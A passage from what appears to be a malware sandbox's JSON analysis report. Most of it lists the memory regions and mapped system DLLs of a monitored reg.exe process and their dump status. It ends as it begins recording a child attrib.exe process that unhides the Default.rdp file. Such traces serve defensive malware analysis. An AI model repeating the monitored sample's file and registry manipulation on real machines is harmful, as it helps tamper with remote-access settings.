262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1414", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:08:11.606", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 589823, "entry_point": 0, "filename": null, "id": "region_1415", "name": "private_0x0000000000050000", "norm_filename": null, "region_type": "private_memory", "start_va": 327680, "timestamp": "00:08:11.609", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 606207, "entry_point": 0, "filename": null, "id": "region_1416", "name": "pagefile_0x0000000000090000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 589824, "timestamp": "00:08:11.609", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 655360, "type": "region", "version": 1 }, "end_va": 659455, "entry_point": 0, "filename": null, "id": "region_1417", "name": "pagefile_0x00000000000a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 655360, "timestamp": "00:08:11.609", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1900543, "entry_point": 0, "filename": null, "id": "region_1418", "name": "private_0x0000000000190000", "norm_filename": null, "region_type": "private_memory", "start_va": 1638400, "timestamp": "00:08:11.609", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 335872, "start_va": 9371648, "type": "region", "version": 1 }, "end_va": 9707519, "entry_point": 9378762, "filename": "\\Windows\\SysWOW64\\reg.exe", "id": "region_1419", "name": "reg.exe", "norm_filename": "c:\\windows\\syswow64\\reg.exe", "region_type": "memory_mapped_file", "start_va": 9371648, "timestamp": "00:08:11.612", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 1996357632, "type": "region", "version": 1 }, "end_va": 1998098431, "entry_point": 1996357632, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1420", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1996357632, "timestamp": "00:08:11.614", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 1998323712, "type": "region", "version": 1 }, "end_va": 1999896575, "entry_point": 1998323712, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_1421", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1998323712, "timestamp": "00:08:11.615", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_1422", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:08:11.616", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001423-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_838", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_1423", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:08:11.616", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001424-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_839", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_1424", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:08:11.616", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001425-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_840", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_1425", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:08:11.617", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1426", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:08:11.617", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001427-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_841", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1427", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:08:11.618", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_1428", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:08:11.618", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001429-addr_0x0000000000100000-size_0x0000000000080000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_842", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1572863, "entry_point": 0, "filename": null, "id": "region_1429", "name": "private_0x0000000000100000", "norm_filename": null, "region_type": "private_memory", "start_va": 1048576, "timestamp": "00:08:11.632", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1936785408, "type": "region", "version": 1 }, "end_va": 1937162239, "entry_point": 1937045400, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_1430", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1936785408, "timestamp": "00:08:11.634", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1937178624, "type": "region", "version": 1 }, "end_va": 1937436671, "entry_point": 1937366648, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_1431", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1937178624, "timestamp": "00:08:11.636", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1937506304, "type": "region", "version": 1 }, "end_va": 1937539071, "entry_point": 1937514744, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_1432", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1937506304, "timestamp": "00:08:11.637", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1433", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:08:11.654", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1434", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:08:11.654", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001435-addr_0x0000000000220000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_843", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 3276799, "entry_point": 0, "filename": null, "id": "region_1435", "name": "private_0x0000000000220000", "norm_filename": null, "region_type": "private_memory", "start_va": 2228224, "timestamp": "00:08:11.655", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 3276800, "type": "region", "version": 1 }, "end_va": 3698687, "entry_point": 3276800, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1436", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 3276800, "timestamp": "00:08:11.656", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001437-addr_0x00000000004d0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_844", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 5046272, "type": "region", "version": 1 }, "end_va": 5111807, "entry_point": 0, "filename": null, "id": "region_1437", "name": "private_0x00000000004d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5046272, "timestamp": "00:08:11.657", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1959854080, "type": "region", "version": 1 }, "end_va": 1959903231, "entry_point": 1959858401, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_1438", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1959854080, "timestamp": "00:08:11.658", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1959919616, "type": "region", "version": 1 }, "end_va": 1960312831, "entry_point": 1960027059, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_1439", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1959919616, "timestamp": "00:08:11.660", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1960312832, "type": "region", "version": 1 }, "end_va": 1960669183, "entry_point": 1960418214, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_1440", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1960312832, "timestamp": "00:08:11.661", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1964244992, "type": "region", "version": 1 }, "end_va": 1965359103, "entry_point": 1964323539, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_1441", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1964244992, "timestamp": "00:08:11.663", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1965359104, "type": "region", "version": 1 }, "end_va": 1966407679, "entry_point": 1965471469, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_1442", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1965359104, "timestamp": "00:08:11.665", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1966800896, "type": "region", "version": 1 }, "end_va": 1967456255, "entry_point": 1966885349, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_1443", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1966800896, "timestamp": "00:08:11.666", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1967456256, "type": "region", "version": 1 }, "end_va": 1968099327, "entry_point": 1967669207, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_1444", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1967456256, "timestamp": "00:08:11.668", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1968111616, "type": "region", "version": 1 }, "end_va": 1968152575, "entry_point": 1968125600, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_1445", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1968111616, "timestamp": "00:08:11.670", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968177152, "type": "region", "version": 1 }, "end_va": 1968881663, "entry_point": 1968219250, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_1446", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968177152, "timestamp": "00:08:11.671", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1970274304, "type": "region", "version": 1 }, "end_va": 1970298879, "entry_point": 1970280322, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_1447", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1970274304, "timestamp": "00:08:11.673", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1971257344, "type": "region", "version": 1 }, "end_va": 1972240383, "entry_point": 1971324265, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_1448", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1971257344, "timestamp": "00:08:11.675", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1972240384, "type": "region", "version": 1 }, "end_va": 1972342783, "entry_point": 1972259189, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_1449", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1972240384, "timestamp": "00:08:11.678", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1972371456, "type": "region", "version": 1 }, "end_va": 1972658175, "entry_point": 1972401272, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_1450", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1972371456, "timestamp": "00:08:11.680", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1974140928, "type": "region", "version": 1 }, "end_va": 1974730751, "entry_point": 1974231875, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_1451", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1974140928, "timestamp": "00:08:11.681", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1974927360, "type": "region", "version": 1 }, "end_va": 1975144447, "entry_point": 1974932573, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_1452", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1974927360, "timestamp": "00:08:11.683", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 1994129408, "type": "region", "version": 1 }, "end_va": 1995153407, "entry_point": 0, "filename": null, "id": "region_1453", "name": "private_0x0000000076dc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1994129408, "timestamp": "00:08:11.684", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 1995177984, "type": "region", "version": 1 }, "end_va": 1996353535, "entry_point": 0, "filename": null, "id": "region_1454", "name": "private_0x0000000076ec0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1995177984, "timestamp": "00:08:11.684", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1455", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:08:11.684", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1456", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:08:11.685", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 5111808, "type": "region", "version": 1 }, "end_va": 6717439, "entry_point": 0, "filename": null, "id": "region_1457", "name": "pagefile_0x00000000004e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5111808, "timestamp": "00:08:11.689", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1966407680, "type": "region", "version": 1 }, "end_va": 1966800895, "entry_point": 1966478735, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_1458", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1966407680, "timestamp": "00:08:11.690", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1971175423, "entry_point": 1970345611, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_1459", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:08:11.693", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_1460", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:08:11.698", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 729087, "entry_point": 0, "filename": null, "id": "region_1461", "name": "pagefile_0x00000000000b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 720896, "timestamp": "00:08:11.698", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 36864, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 823295, "entry_point": 786432, "filename": "\\Windows\\SysWOW64\\en-US\\reg.exe.mui", "id": "region_1462", "name": "reg.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\reg.exe.mui", "region_type": "memory_mapped_file", "start_va": 786432, "timestamp": "00:08:11.699", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001463-addr_0x00000000000d0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_845", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 856063, "entry_point": 0, "filename": null, "id": "region_1463", "name": "private_0x00000000000d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 851968, "timestamp": "00:08:11.700", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001464-addr_0x00000000000e0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_846", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 921599, "entry_point": 0, "filename": null, "id": "region_1464", "name": "private_0x00000000000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 917504, "timestamp": "00:08:11.700", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 6750208, "type": "region", "version": 1 }, "end_va": 8327167, "entry_point": 0, "filename": null, "id": "region_1465", "name": "pagefile_0x0000000000670000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6750208, "timestamp": "00:08:11.700", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 9764864, "type": "region", "version": 1 }, "end_va": 30736383, "entry_point": 0, "filename": null, "id": "region_1466", "name": "pagefile_0x0000000000950000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9764864, "timestamp": "00:08:11.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 30736384, "type": "region", "version": 1 }, "end_va": 33681407, "entry_point": 30736384, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1467", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 30736384, "timestamp": "00:08:11.703", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 3735552, "type": "region", "version": 1 }, "end_va": 4521983, "entry_point": 3735552, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_1468", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 3735552, "timestamp": "00:08:11.712", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "attrib Default.rdp -s -h", "filename": "c:\\windows\\syswow64\\attrib.exe", "id": "proc_10", "image_name": "attrib.exe", "monitor_reason": "child_process", "monitored_id": 10, "origin_monitor_id": 5, "ref_parent_process": { "ref_id": "proc_5", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000010-region_00001469-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_847", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1469", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:08:11.764", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001470-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_848", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_1470", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": 